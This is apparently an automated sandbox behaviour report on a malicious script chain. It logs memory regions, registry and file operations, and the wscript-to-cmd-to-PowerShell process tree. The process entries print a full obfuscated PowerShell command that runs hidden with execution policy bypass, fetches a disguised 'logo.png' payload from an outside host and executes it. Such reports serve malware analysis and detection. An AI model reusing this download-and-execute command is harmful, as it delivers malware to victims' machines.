Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
buffer	0x7FF0010D000	0x7FF0010DFFF	First Execution	-	64-bit	0x7FF0010D120, 0x7FF0010D0E0, ...	... Region Actions Download Dump
powershell.exe	0x13FF20000	0x13FF96FFF	Relevant Image	-	64-bit	-	... Region Actions Download Dump
buffer	0x7FF000FB000	0x7FF000FBFFF	First Execution	-	64-bit	0x7FF000FBA40, 0x7FF000FB012	... Region Actions Download Dump
buffer	0x7FF00133000	0x7FF00133FFF	First Execution	-	64-bit	0x7FF00133A7D	... Region Actions Download Dump
buffer	0x02B8B000	0x02B97FFF	First Execution	-	64-bit	0x02B964E0, 0x02B97308, ...	... Region Actions Download Dump
buffer	0x7FF00135000	0x7FF00135FFF	First Execution	-	64-bit	0x7FF0013507D	... Region Actions Download Dump
buffer	0x7FF00136000	0x7FF00136FFF	First Execution	-	64-bit	0x7FF0013607D	... Region Actions Download Dump
buffer	0x7FF0010F000	0x7FF0010FFFF	First Execution	-	64-bit	0x7FF0010F000	... Region Actions Download Dump
buffer	0x7FF00270000	0x7FF00270FFF	First Execution	-	64-bit	0x7FF00270130	... Region Actions Download Dump

Threads

Thread 0x5fc

307

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	13	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	3	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn

Thread 0x7b0

35

0

»

Category	Operation	Information	Success	Count	Logfile

Process #22: cmd.exe

50

0

»

Information	Value
ID	#22
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:21, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:04

OS Process Information

»

Information	Value
PID	0xbcc
Parent PID	0x8c0 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BDC

Threads

Thread 0xbdc

50

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:24 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 152334	1	Fn
System	Get Time	type = Performance Ctr, time = 20662349610	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn

Process #23: powershell.exe

268

0

»

Information	Value
ID	#23
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:22, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:03:03

OS Process Information

»

Information	Value
PID	0xafc
Parent PID	0xbcc (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9E4 0x A30 0x A0C 0x B7C 0x AEC 0x BB8 0x 808 0x A20

Threads

Thread 0x9e4

233

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
